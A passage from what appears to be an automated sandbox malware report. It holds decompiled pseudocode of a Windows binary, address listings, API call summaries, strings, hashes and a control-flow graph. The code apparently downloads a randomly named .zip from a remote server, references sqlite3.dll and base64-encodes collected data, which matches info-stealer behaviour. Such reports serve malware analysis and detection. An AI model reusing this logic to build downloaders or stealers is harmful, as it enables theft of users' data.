						 *((intOrPtr*)(_t214 + 0x10)) = 0;
						 *_t214 = 0;
						E00404331(_t214,  &_v2300);
						_t269 = _t268 - 0x1c;
						_v20 = 7;
						_t249 = _t269;
						_v2504 = _t269;
						E00404778(_t269, _t237);
						_v24 = 0;
						E0040AB1D(0, _t237, _t269, _t279);
						_t262 = _t269 + 0x38;
					}
					_t136 =  *0x4442dc; // 0x4be1588
					if( *0x4442f0 < 0x10) {
						_t136 = _t237;
					}
					_t137 =  *0x446458(_t136, "ERROR");
					_t281 = _t137;
					if(_t137 != 0) {
						break;
					}
					_push("|");
					_t264 = _t262 - 0x1c;
					_v2500 = _t264;
					E004083FB(_t264);
					_t265 = _t264 - 0x1c;
					_v24 = 9;
					_t249 = _t265;
					_v2508 = _t265;
					E0040841E(_t265);
					_v24 = 0;
					E0040A9FD(0, _t214, _t234, _t237, _t265, _t281);
					_t193 =  *0x4442dc; // 0x4be1588
					_t262 = _t265 + 0x3c;
					if( *0x4442f0 < 0x10) {
						_t193 = _t237;
					}
					_t194 =  *0x446458(_t193, "ERROR");
					_t283 = _t194;
					if(_t194 != 0) {
						_t266 = _t262 - 0x1c;
						_t214 = _t266;
						_v2508 = _t266;
						 *((intOrPtr*)(_t214 + 0x14)) = 0xf;
						 *((intOrPtr*)(_t214 + 0x10)) = 0;
						 *_t214 = 0;
						E00404331(_t214,  &_v2316);
						_t267 = _t266 - 0x1c;
						_v36 = 0xa;
						_t249 = _t267;
						_v2520 = _t267;
						E00404778(_t267, _t237);
						_v40 = 0;
						E0040AB1D(0, _t237, _t267, _t283);
						_t262 = _t267 + 0x38;
					}
					_t195 =  *0x4442dc; // 0x4be1588
					if( *0x4442f0 < 0x10) {
						_t195 = _t237;
					}
					_t196 =  *0x446458(_t195, "ERROR");
					_t277 = _t196;
					if(_t196 == 0) {
						Sleep(0x1d4c0); // executed
						continue;
					}
					break;
				}
				 *0x4461f0 = E0041CDBD(0, _t237, _t249, _t256, __eflags);
				_t215 = 0x3e8;
				_t139 =  &_v1044;
				do {
					 *_t139 = 0;
					_t139 = _t139 + 1;
					_t215 = _t215 - 1;
					__eflags = _t215;
				} while (_t215 != 0);
				__eflags =  *0x4442f0 - 0x10;
				if(__eflags >= 0) {
					_t237 =  *0x4442dc; // 0x4be1588
				}
				lstrcatA( &_v1044, _t237);
				lstrcatA( &_v1044, "/");
				_t144 = 0xa;
				lstrcatA( &_v1044, E00415EF6(_t144, __eflags));
				lstrcatA( &_v1044, ".zip");
				_t150 = E0040DE3A( &_v1044, __eflags);
				_push(_t234);
				_push(_t150);
				 *0x4461e4 = E00408202(0, _t234, _t237, _t249, __eflags);
				_t152 = E0040AC0F(0, 0x43c8d8, 0);
				_t218 =  *0x4465e4; // 0x0
				_v2491 = _t218;
				_t219 =  *0x4465e5; // 0x0
				_v2490 = _t219;
				_t220 =  *0x4465e7; // 0x0
				_v2489 = _t220;
				_t221 =  *0x4465e8; // 0x0
				_v2488 = _t221;
				_t222 =  *0x4465e9; // 0x0
				_t263 = _t262 + 0xc;
				__eflags =  *0x4465e6; // 0x0
				_v2487 = _t222;
				_t223 =  *0x4461f0; // 0x0
				_v2460 = _t223;
				_t224 = _t223 & 0xffffff00 | __eflags != 0x00000000;
				_t250 =  &_v2492;
				_v2492 = 1;
				_v2486 = _t223 & 0xffffff00 | __eflags != 0x00000000;
				E004133B9(_t234,  &_v2492, __eflags, _t152, _t234);
				__eflags =  *0x4465ec; // 0x0
				if(__eflags != 0) {
					E0040903E(0, 0x43c8d8,  &_v2492);
				}
				E0040AFB3(0, _t224, _t234, 0x43c8d8, _t250, __eflags, _t285);
				__eflags =  *0x4465e6; // 0x0
				if(__eflags != 0) {
					E0040CB83(0, _t234, 0x43c8d8,  &_v2456, __eflags);
				}
				__eflags =  *0x4465eb; // 0x0
				if(__eflags != 0) {
					E00409E88();
				}
				__eflags =  *0x4465ea; // 0x0
				if(__eflags != 0) {
					E004166F5(_t234);
				}
				_t156 =  *0x4461f0; // 0x0
				E0041CED3(_t156, _t224,  &_v2504,  &_v2496);
				_t240 = 0;
				_v2520 = 0;
				__eflags = _v2504;
				if(_v2504 != 0) {
					_t181 = CryptBinaryToStringA(_v2504, _v2496, 0x40000001, 0,  &_v2520);
					__eflags = _t181;
					if(_t181 != 0) {
						_t183 = HeapAlloc(GetProcessHeap(), 0, _v2536);
						_t240 = _t183;
						__eflags = _t240;
						if(_t240 != 0) {
							_t233 = _v2536;
							__eflags = _t233;
							while(_t233 != 0) {
								 *_t183 = 0;
								_t183 =  &(_t183[1]);
								_t233 = _t233 - 1;
								__eflags = _t233;
							}
							CryptBinaryToStringA(_v2520, _v2512, 0x40000001, _t240,  &_v2536);
						}
					}
				}
				_v2512 = _v2520;
				_t251 = E0040ACB9;
				_v2516 = _t240;
				CreateThread(0, 0, E0040ACB9,  &_v2516, 0, 0);
				_t241 = 0;
				while(1) {
					__eflags =  *0x4465f0; // 0x0
					if(__eflags != 0) {
						goto L64;
					}
					__eflags =  *0x4465f4; // 0x0
					if(__eflags == 0) {
						__eflags = _t241 - 0x12c;
						if(__eflags > 0) {
							_t170 = _t241 - 0x168;
							__eflags = _t170;
							if(_t170 == 0) {
								goto L61;
							} else {
								_t173 = _t170 - 0x3c;
								__eflags = _t173;
								if(_t173 == 0) {
									goto L61;
								} else {
									__eflags = _t173 - 0x3c;
									goto L60;
								}
							}
						} else {
							if(__eflags == 0) {
								L61:
								CreateThread(0, 0, _t251,  &_v2520, 0, 0);
							} else {
								_t232 = 0x3c;
								_t176 = _t241 - _t232;
								__eflags = _t176;
								if(_t176 == 0) {
									goto L61;
								} else {
									_t177 = _t176 - _t232;
									__eflags = _t177;
									if(_t177 == 0) {
										goto L61;
									} else {
										__eflags = _t177 - _t232;
										if(__eflags == 0) {
											goto L61;
										} else {
											L60:
											if(__eflags == 0) {
												goto L61;
											}
										}
									}
								}
							}
						}
						Sleep(0x3e8);
						_t241 = _t241 + 1;
						__eflags = _t241;
						continue;
					}
					L65:
					_t161 = CloseHandle( *0x4461f4);
					_t242 =  *0x4461f0; // 0x0
					__eflags = _t242;
					if(_t242 == 0) {
						L68:
						E0041CF3E(_t242);
					} else {
						 *_t242 - 1 = _t161 & 0xffffff00 |  *_t242 == 0x00000001;
						if((_t161 & 0xffffff00 |  *_t242 == 0x00000001) == 0) {
							goto L68;
						} else {
							E00408318(_t251, _t242);
						}
					}
					E004164A1(0, _t234, _t242, _t251, __eflags);
					_t164 = E00404354( &_v2460, 1, 0);
					 *[fs:0x0] = _v44;
					_pop(_t243);
					_pop(_t252);
					_pop(_t207);
					__eflags = _v52 ^ _t263;
					return E0041DA9B(_t164, _t207, _v52 ^ _t263, _t234, _t243, _t252);
				}
				do {
					L64:
					Sleep(0x3e8);
					__eflags =  *0x4465f8; // 0x0
				} while (__eflags == 0);
				goto L65;
			}

















































































































                                                                    0x0040b7ec
                                                                    0x0040b7ec
                                                                    0x0040b7f2
                                                                    0x0040b7f4
                                                                    0x0040b7ff
                                                                    0x0040b800
                                                                    0x0040b806
                                                                    0x0040b80d
                                                                    0x0040b815
                                                                    0x0040b816
                                                                    0x0040b817
                                                                    0x0040b81e
                                                                    0x0040b826
                                                                    0x0040b82e
                                                                    0x0040b836
                                                                    0x0040b83a
                                                                    0x0040b83e
                                                                    0x0040b845
                                                                    0x0040b84a
                                                                    0x0040b84f
                                                                    0x0040b859
                                                                    0x0040b85f
                                                                    0x0040b864
                                                                    0x0040b86b
                                                                    0x0040b86b
                                                                    0x0040b86d
                                                                    0x0040b86e
                                                                    0x0040b86e
                                                                    0x0040b86e
                                                                    0x0040b878
                                                                    0x0040b87d
                                                                    0x0040b889
                                                                    0x0040b88b
                                                                    0x0040b88b
                                                                    0x0040b896
                                                                    0x0040b8a6
                                                                    0x0040b8ad
                                                                    0x0040b8b2
                                                                    0x0040b8b6
                                                                    0x0040b8bb
                                                                    0x0040b8c3
                                                                    0x0040b8c7
                                                                    0x0040b8c9
                                                                    0x0040b8c9
                                                                    0x0040b8d4
                                                                    0x0040b8e1
                                                                    0x0040b8e8
                                                                    0x0040b8f4
                                                                    0x0040b8f9
                                                                    0x0040b905
                                                                    0x0040b907
                                                                    0x0040b907
                                                                    0x0040b912
                                                                    0x0040b922
                                                                    0x0040b929
                                                                    0x0040b947
                                                                    0x0040b951
                                                                    0x0040b957
                                                                    0x0040b95e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040b936
                                                                    0x0040b941
                                                                    0x0040b941
                                                                    0x0040b971
                                                                    0x0040b976
                                                                    0x0040b97b
                                                                    0x0040b982
                                                                    0x0040b982
                                                                    0x0040b984
                                                                    0x0040b985
                                                                    0x0040b985
                                                                    0x0040b995
                                                                    0x0040b9a2
                                                                    0x0040b9a7
                                                                    0x0040b9af
                                                                    0x0040b9b3
                                                                    0x0040b9b5
                                                                    0x0040b9b5
                                                                    0x0040b9c0
                                                                    0x0040b9c9
                                                                    0x0040b9d0
                                                                    0x0040b9d7
                                                                    0x0040b9dc
                                                                    0x0040b9e1
                                                                    0x0040b9e1
                                                                    0x0040b9e6
                                                                    0x0040b9eb
                                                                    0x0040b9ef
                                                                    0x0040b9f4
                                                                    0x0040b9f7
                                                                    0x0040b9ff
                                                                    0x0040ba01
                                                                    0x0040ba05
                                                                    0x0040ba0a
                                                                    0x0040ba11
                                                                    0x0040ba16
                                                                    0x0040ba1b
                                                                    0x0040ba25
                                                                    0x0040ba27
                                                                    0x0040ba27
                                                                    0x0040ba2f
                                                                    0x0040ba35
                                                                    0x0040ba37
                                                                    0x0040ba39
                                                                    0x0040ba3c
                                                                    0x0040ba45
                                                                    0x0040ba49
                                                                    0x0040ba50
                                                                    0x0040ba54
                                                                    0x0040ba56
                                                                    0x0040ba5b
                                                                    0x0040ba5e
                                                                    0x0040ba66
                                                                    0x0040ba68
                                                                    0x0040ba6d
                                                                    0x0040ba72
                                                                    0x0040ba79
                                                                    0x0040ba7e
                                                                    0x0040ba7e
                                                                    0x0040ba88
                                                                    0x0040ba8d
                                                                    0x0040ba8f
                                                                    0x0040ba8f
                                                                    0x0040ba97
                                                                    0x0040ba9d
                                                                    0x0040ba9f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040baa5
                                                                    0x0040baaa
                                                                    0x0040baaf
                                                                    0x0040bab3
                                                                    0x0040bab8
                                                                    0x0040babb
                                                                    0x0040bac3
                                                                    0x0040bac5
                                                                    0x0040bac9
                                                                    0x0040bace
                                                                    0x0040bad5
                                                                    0x0040bada
                                                                    0x0040badf
                                                                    0x0040bae9
                                                                    0x0040baeb
                                                                    0x0040baeb
                                                                    0x0040baf3
                                                                    0x0040baf9
                                                                    0x0040bafb
                                                                    0x0040bafd
                                                                    0x0040bb00
                                                                    0x0040bb09
                                                                    0x0040bb0d
                                                                    0x0040bb14
                                                                    0x0040bb18
                                                                    0x0040bb1a
                                                                    0x0040bb1f
                                                                    0x0040bb22
                                                                    0x0040bb2a
                                                                    0x0040bb2c
                                                                    0x0040bb31
                                                                    0x0040bb36
                                                                    0x0040bb3d
                                                                    0x0040bb42
                                                                    0x0040bb42
                                                                    0x0040bb4c
                                                                    0x0040bb51
                                                                    0x0040bb53
                                                                    0x0040bb53
                                                                    0x0040bb5b
                                                                    0x0040bb61
                                                                    0x0040bb63
                                                                    0x0040bb6a
                                                                    0x00000000
                                                                    0x0040bb6a
                                                                    0x00000000
                                                                    0x0040bb63
                                                                    0x0040bb7a
                                                                    0x0040bb7f
                                                                    0x0040bb84
                                                                    0x0040bb8b
                                                                    0x0040bb8b
                                                                    0x0040bb8d
                                                                    0x0040bb8e
                                                                    0x0040bb8e
                                                                    0x0040bb8e
                                                                    0x0040bb91
                                                                    0x0040bb98
                                                                    0x0040bb9a
                                                                    0x0040bb9a
                                                                    0x0040bba9
                                                                    0x0040bbbc
                                                                    0x0040bbc4
                                                                    0x0040bbd3
                                                                    0x0040bbe6
                                                                    0x0040bbf3
                                                                    0x0040bbf8
                                                                    0x0040bbf9
                                                                    0x0040bc0a
                                                                    0x0040bc0f
                                                                    0x0040bc14
                                                                    0x0040bc1a
                                                                    0x0040bc1e
                                                                    0x0040bc24
                                                                    0x0040bc28
                                                                    0x0040bc2e
                                                                    0x0040bc32
                                                                    0x0040bc38
                                                                    0x0040bc3c
                                                                    0x0040bc42
                                                                    0x0040bc45
                                                                    0x0040bc4b
                                                                    0x0040bc4f
                                                                    0x0040bc56
                                                                    0x0040bc5a
                                                                    0x0040bc5e
                                                                    0x0040bc62
                                                                    0x0040bc67
                                                                    0x0040bc6b
                                                                    0x0040bc70
                                                                    0x0040bc76
                                                                    0x0040bc78
                                                                    0x0040bc78
                                                                    0x0040bc7d
                                                                    0x0040bc82
                                                                    0x0040bc88
                                                                    0x0040bc8e
                                                                    0x0040bc8e
                                                                    0x0040bc93
                                                                    0x0040bc99
                                                                    0x0040bc9b
                                                                    0x0040bc9b
                                                                    0x0040bca0
                                                                    0x0040bca6
                                                                    0x0040bca8
                                                                    0x0040bca8
                                                                    0x0040bcb2
                                                                    0x0040bcbb
                                                                    0x0040bcc0
                                                                    0x0040bcc3
                                                                    0x0040bcc7
                                                                    0x0040bccb
                                                                    0x0040bce1
                                                                    0x0040bce7
                                                                    0x0040bce9
                                                                    0x0040bcf7
                                                                    0x0040bcfd
                                                                    0x0040bcff
                                                                    0x0040bd01
                                                                    0x0040bd03
                                                                    0x0040bd07
                                                                    0x0040bd09
                                                                    0x0040bd0b
                                                                    0x0040bd0d
                                                                    0x0040bd0e
                                                                    0x0040bd0e
                                                                    0x0040bd0e
                                                                    0x0040bd20
                                                                    0x0040bd20
                                                                    0x0040bd01
                                                                    0x0040bce9
                                                                    0x0040bd2c
                                                                    0x0040bd35
                                                                    0x0040bd3d
                                                                    0x0040bd41
                                                                    0x0040bd47
                                                                    0x0040bda2
                                                                    0x0040bda2
                                                                    0x0040bda8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040bd4b
                                                                    0x0040bd51
                                                                    0x0040bd58
                                                                    0x0040bd5a
                                                                    0x0040bd75
                                                                    0x0040bd75
                                                                    0x0040bd7a
                                                                    0x00000000
                                                                    0x0040bd7c
                                                                    0x0040bd7c
                                                                    0x0040bd7c
                                                                    0x0040bd7f
                                                                    0x00000000
                                                                    0x0040bd81
                                                                    0x0040bd81
                                                                    0x00000000
                                                                    0x0040bd81
                                                                    0x0040bd7f
                                                                    0x0040bd5c
                                                                    0x0040bd5c
                                                                    0x0040bd86
                                                                    0x0040bd90
                                                                    0x0040bd5e
                                                                    0x0040bd62
                                                                    0x0040bd63
                                                                    0x0040bd63
                                                                    0x0040bd65
                                                                    0x00000000
                                                                    0x0040bd67
                                                                    0x0040bd67
                                                                    0x0040bd67
                                                                    0x0040bd69
                                                                    0x00000000
                                                                    0x0040bd6b
                                                                    0x0040bd6b
                                                                    0x0040bd6d
                                                                    0x00000000
                                                                    0x0040bd6f
                                                                    0x0040bd84
                                                                    0x0040bd84
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040bd84
                                                                    0x0040bd6d
                                                                    0x0040bd69
                                                                    0x0040bd65
                                                                    0x0040bd5c
                                                                    0x0040bd9b
                                                                    0x0040bda1
                                                                    0x0040bda1
                                                                    0x00000000
                                                                    0x0040bda1
                                                                    0x0040bdbd
                                                                    0x0040bdc3
                                                                    0x0040bdc9
                                                                    0x0040bdcf
                                                                    0x0040bdd1
                                                                    0x0040bde6
                                                                    0x0040bde6
                                                                    0x0040bdd3
                                                                    0x0040bdd9
                                                                    0x0040bddb
                                                                    0x00000000
                                                                    0x0040bddd
                                                                    0x0040bdde
                                                                    0x0040bde3
                                                                    0x0040bddb
                                                                    0x0040bdeb
                                                                    0x0040bdf7
                                                                    0x0040be03
                                                                    0x0040be0b
                                                                    0x0040be0c
                                                                    0x0040be0d
                                                                    0x0040be15
                                                                    0x0040be1f
                                                                    0x0040be1f
                                                                    0x0040bdaa
                                                                    0x0040bdaa
                                                                    0x0040bdaf
                                                                    0x0040bdb5
                                                                    0x0040bdb5
                                                                    0x00000000

                                                                    APIs
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32(76FF0000,0040B84F), ref: 00418B19
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32 ref: 00418B30
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32 ref: 00418B47
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32 ref: 00418B5E
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32 ref: 00418B75
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32 ref: 00418B8C
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32 ref: 00418BA3
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32 ref: 00418BBA
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32 ref: 00418BD1
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32 ref: 00418BE8
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32 ref: 00418BFF
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32 ref: 00418C16
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32 ref: 00418C2D
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32 ref: 00418C44
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32 ref: 00418C5B
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32 ref: 00418C72
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32 ref: 00418C89
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32 ref: 00418CA0
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32 ref: 00418CB7
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32 ref: 00418CCE
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32 ref: 00418CE5
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32 ref: 00418CFC
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32 ref: 00418D13
                                                                      • Part of subcall function 00418B05: GetProcAddress.KERNEL32 ref: 00418D2A
                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040B896
                                                                    • lstrcatA.KERNEL32(?,00000000,00000001,00000000), ref: 0040B8D4
                                                                    • lstrcatA.KERNEL32(?,00000000,00000001,00000000), ref: 0040B912
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040B936
                                                                    • Sleep.KERNEL32(00001388), ref: 0040B941
                                                                    • OpenEventA.KERNEL32(001F0003,00000000,?,00000001,00000000), ref: 0040B951
                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,?), ref: 0040B96B
                                                                    • lstrcatA.KERNEL32(?,0043EC2C), ref: 0040B995
                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040B9C0
                                                                    • StrCmpCA.SHLWAPI(04BE1588,ERROR), ref: 0040BA2F
                                                                    • StrCmpCA.SHLWAPI(04BE1588,ERROR), ref: 0040BA97
                                                                    • StrCmpCA.SHLWAPI(04BE1588,ERROR), ref: 0040BAF3
                                                                    • StrCmpCA.SHLWAPI(04BE1588,ERROR), ref: 0040BB5B
                                                                    • Sleep.KERNELBASE(0001D4C0), ref: 0040BB6A
                                                                    • lstrcatA.KERNEL32(?,004442DC), ref: 0040BBA9
                                                                    • lstrcatA.KERNEL32(?,0043EC2C), ref: 0040BBBC
                                                                      • Part of subcall function 00415EF6: _malloc.LIBCMT ref: 00415EFC
                                                                      • Part of subcall function 00415EF6: GetTickCount.KERNEL32 ref: 00415F07
                                                                      • Part of subcall function 00415EF6: _rand.LIBCMT ref: 00415F1C
                                                                      • Part of subcall function 00415EF6: wsprintfA.USER32 ref: 00415F2F
                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 0040BBD3
                                                                    • lstrcatA.KERNEL32(?,.zip), ref: 0040BBE6
                                                                      • Part of subcall function 0040DE3A: StrCmpCA.SHLWAPI(00000000,https,004442DC,?,00000000), ref: 0040DE70
                                                                      • Part of subcall function 0040DE3A: GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040DE83
                                                                      • Part of subcall function 0040DE3A: HeapAlloc.KERNEL32(00000000), ref: 0040DE8A
                                                                      • Part of subcall function 0040DE3A: InternetOpenA.WININET(0043C8D8,00000000,00000000,00000000,00000000), ref: 0040DE9C
                                                                      • Part of subcall function 0040DE3A: InternetSetOptionA.WININET(00000000,00000002,?,00000004), ref: 0040DEB7
                                                                      • Part of subcall function 0040DE3A: InternetOpenUrlA.WININET(00000000,?,00000000,00000000,04000100,00000000), ref: 0040DED3
                                                                      • Part of subcall function 0040DE3A: InternetCloseHandle.WININET(00000000), ref: 0040DF11
                                                                      • Part of subcall function 0040DE3A: InternetCloseHandle.WININET(?), ref: 0040DF1A
                                                                      • Part of subcall function 00408202: __EH_prolog3.LIBCMT ref: 00408209
                                                                      • Part of subcall function 0040AC0F: GetProcessHeap.KERNEL32(00000000,?), ref: 0040AC72
                                                                      • Part of subcall function 0040AC0F: HeapAlloc.KERNEL32(00000000), ref: 0040AC79
                                                                      • Part of subcall function 004133B9: GetProcessHeap.KERNEL32(00000000,0098967F,0043C8D8,00000000), ref: 004133D6
                                                                      • Part of subcall function 004133B9: HeapAlloc.KERNEL32(00000000), ref: 004133DD
                                                                    • CryptBinaryToStringA.CRYPT32(?,00000001,40000001,00000000,?), ref: 0040BCE1
                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 0040BCF0
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 0040BCF7
                                                                    • CryptBinaryToStringA.CRYPT32(?,00000001,40000001,00000000,?), ref: 0040BD20
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_0000ACB9,?,00000000,00000000), ref: 0040BD41
                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_0000ACB9,?,00000000,00000000), ref: 0040BD90
                                                                    • Sleep.KERNEL32(000003E8), ref: 0040BD9B
                                                                    • Sleep.KERNEL32(000003E8), ref: 0040BDAF
                                                                    • CloseHandle.KERNEL32 ref: 0040BDC3
                                                                      • Part of subcall function 0040903E: lstrcatA.KERNEL32(?), ref: 0040907F
                                                                      • Part of subcall function 0040903E: lstrcatA.KERNEL32(?,00000000), ref: 00409095
                                                                      • Part of subcall function 0040903E: lstrcatA.KERNEL32(?,?), ref: 004090A9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressProc$lstrcat$Heap$Internet$AllocCloseHandleProcessSleep$CreateOpen$BinaryCryptEventStringThread$CountH_prolog3OptionTick_malloc_randwsprintf
                                                                    • String ID: .zip$ERROR$sqlite3.dll
                                                                    • API String ID: 3485534380-1912465208
                                                                    • Opcode ID: 4f7ad39070347914283b21a27445a946a07588db11bf74e0a69aa3b5ad8fda64
                                                                    • Instruction ID: c1a536a978d1d65f318c699a06e9751ecdf5777d7b1f99d3148499f142e5a99c
                                                                    • Opcode Fuzzy Hash: 4f7ad39070347914283b21a27445a946a07588db11bf74e0a69aa3b5ad8fda64
                                                                    • Instruction Fuzzy Hash: 1CF1C4755083809FD720EB65DC45A9B7BA8EB97304F05097FF585A3292CB389844CBAF
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040A1C1 Relevance: 30.3, APIs: 12, Strings: 5, Instructions: 566networkfileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 214 40a1c1-40a2cf call 42e300 call 40a07d call 4042ed call 404354 call 40c0f9 225 40a2d1-40a2e9 call 40c0f9 214->225 226 40a2eb 214->226 225->226 228 40a2ee-40a30d call 40c06b 225->228 226->228 232 40a345-40a361 call 40c034 228->232 233 40a30f-40a343 call 404396 228->233 238 40a368-40a379 call 4042ed 232->238 233->238 241 40a37b-40a388 call 404354 238->241 242 40a38d-40a398 238->242 241->242 244 40a39a-40a3a7 call 404354 242->244 245 40a3ac-40a3b8 242->245 244->245 247 40a3ba-40a3c1 245->247 248 40a3cb-40a3d2 245->248 251 40a3e0-40a3ef 247->251 252 40a3c3-40a3c9 247->252 249 40a3d4 248->249 250 40a3da 248->250 249->250 250->251 253 40a3f1 251->253 254 40a3f7-40a459 call 40c37a call 4042ed call 404354 call 40c00f 251->254 252->251 253->254 263 40a479-40a48f call 404778 254->263 264 40a45b-40a477 call 40c034 254->264 269 40a493-40a4a4 call 4042ed 263->269 264->269 272 40a4b5-40a4c0 269->272 273 40a4a6-40a4b0 call 404354 269->273 275 40a4c2-40a4cf call 404354 272->275 276 40a4d4-40a4ec call 40c00f 272->276 273->272 275->276 280 40a50e-40a540 call 404396 276->280 281 40a4ee-40a50c call 40c034 276->281 286 40a546-40a557 call 4042ed 280->286 281->286 289 40a559-40a566 call 404354 286->289 290 40a56b-40a576 286->290 289->290 292 40a578-40a585 call 404354 290->292 293 40a58a-40a590 290->293 292->293 295 40a592 293->295 296 40a598-40a5ce call 40c034 call 4042ed call 404354 293->296 295->296 303 40a5d0-40a5ec call 40c034 296->303 304 40a5ee-40a623 call 404396 296->304 309 40a629-40a63a call 4042ed 303->309 304->309 312 40a651-40a65c 309->312 313 40a63c-40a64c call 404354 309->313 314 40a66d-40a685 call 40c00f 312->314 315 40a65e-40a668 call 404354 312->315 313->312 320 40a687-40a6a8 call 40c034 314->320 321 40a6aa-40a6df call 404396 314->321 315->314 326 40a6e5-40a6f9 call 4042ed 320->326 321->326 329 40a710-40a71e 326->329 330 40a6fb-40a70b call 404354 326->330 332 40a720-40a730 call 404354 329->332 333 40a735-40a73f 329->333 330->329 332->333 335 40a741-40a759 call 40c034 333->335 336 40a75b-40a76e call 404778 333->336 341 40a775-40a78c call 4042ed 335->341 336->341 344 40a7a2-40a7b0 341->344 345 40a78e-40a79d call 404354 341->345 346 40a7b2-40a7be call 404354 344->346 347 40a7c3-40a7c8 344->347 345->344 346->347 350 40a7ce-40a7d2 347->350 350->350 351 40a7d4-40a7e3 350->351 352 40a7e5 351->352 353 40a7eb-40a7fe DeleteUrlCacheEntry 351->353 352->353 354 40a800 353->354 355 40a806-40a82b DeleteUrlCacheEntry InternetOpenA 353->355 354->355 356 40a833-40a849 call 41ea23 355->356 357 40a82d 355->357 360 40a851-40a872 StrCmpCA 356->360 361 40a84b 356->361 357->356 362 40a960-40a966 360->362 363 40a878-40a885 360->363 361->360 364 40a967-40a9fc call 404331 call 404354 * 7 call 41da9b 362->364 365 40a887 363->365 366 40a88d-40a8a5 InternetConnectA 363->366 365->366 368 40a957-40a95a InternetCloseHandle 366->368 369 40a8ab-40a8b8 366->369 368->362 371 40a8c0-40a8d6 HttpOpenRequestA 369->371 372 40a8ba 369->372 374 40a8d8-40a904 HttpSendRequestA HttpQueryInfoA 371->374 375 40a94e-40a951 InternetCloseHandle 371->375 372->371 377 40a906-40a90b 374->377 378 40a90d-40a91f call 41ea23 374->378 375->368 377->364 378->377 384 40a921-40a924 378->384 386 40a926-40a940 InternetReadFile 384->386 387 40a947-40a948 InternetCloseHandle 384->387 386->387 387->375
                                                                    C-Code - Quality: 89%
                                                                    			E0040A1C1(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t283;
				signed int _t284;
				intOrPtr _t287;
				void* _t290;
				short _t297;
				void* _t299;
				intOrPtr _t301;
				intOrPtr _t302;
				void* _t311;
				short _t314;
				void* _t316;
				void* _t320;
				void* _t325;
				void* _t328;
				void* _t330;
				void* _t332;
				void* _t333;
				char* _t335;
				char* _t336;
				char* _t338;
				void* _t340;
				intOrPtr _t341;
				intOrPtr _t343;
				signed int _t344;
				char* _t356;
				void* _t357;
				void* _t359;
				short _t361;
				void* _t366;
				void* _t396;
				short _t402;
				void* _t403;
				void* _t406;
				char* _t420;
				void* _t442;
				void* _t445;
				void* _t448;
				void* _t458;
				long _t462;
				char* _t463;
				void* _t464;
				void* _t465;
				signed int _t471;
				void* _t473;

				_t471 = _t473 - 0x3de8;
				E0042E300(0x3de8);
				_push(0xffffffff);
				_push(E00433F4A);
				_push( *[fs:0x0]);
				_t283 =  *0x443674; // 0x393162b1
				_t284 = _t283 ^ _t471;
				 *(_t471 + 0x3de4) = _t284;
				_push(_t284);
				 *[fs:0x0] = _t471 - 0xc;
				 *((intOrPtr*)(_t471 - 0x20)) =  *((intOrPtr*)(_t471 + 0x3df0));
				 *(_t471 - 0x10) = 0;
				 *(_t471 - 4) = 0;
				_t287 = 0xf;
				 *((intOrPtr*)(_t471 + 0x228)) = _t287;
				 *((intOrPtr*)(_t471 + 0x224)) = 0;
				 *(_t471 + 0x214) = 0;
				 *((intOrPtr*)(_t471 + 0x20c)) = _t287;
				 *(_t471 + 0x208) = 0;
				 *(_t471 + 0x1f8) = 0;
				 *((intOrPtr*)(_t471 + 0x244)) = _t287;
				 *(_t471 + 0x240) = 0;
				 *((char*)(_t471 + 0x230)) = 0;
				 *((intOrPtr*)(_t471 + 0x1d4)) = _t287;
				 *((intOrPtr*)(_t471 + 0x1d0)) = 0;
				 *((char*)(_t471 + 0x1c0)) = 0;
				 *((intOrPtr*)(_t471 + 0x1f0)) = _t287;
				 *((intOrPtr*)(_t471 + 0x1ec)) = 0;
				 *((char*)(_t471 + 0x1dc)) = 0;
				 *((intOrPtr*)(_t471 + 0x1b8)) = _t287;
				 *((intOrPtr*)(_t471 + 0x1b4)) = 0;
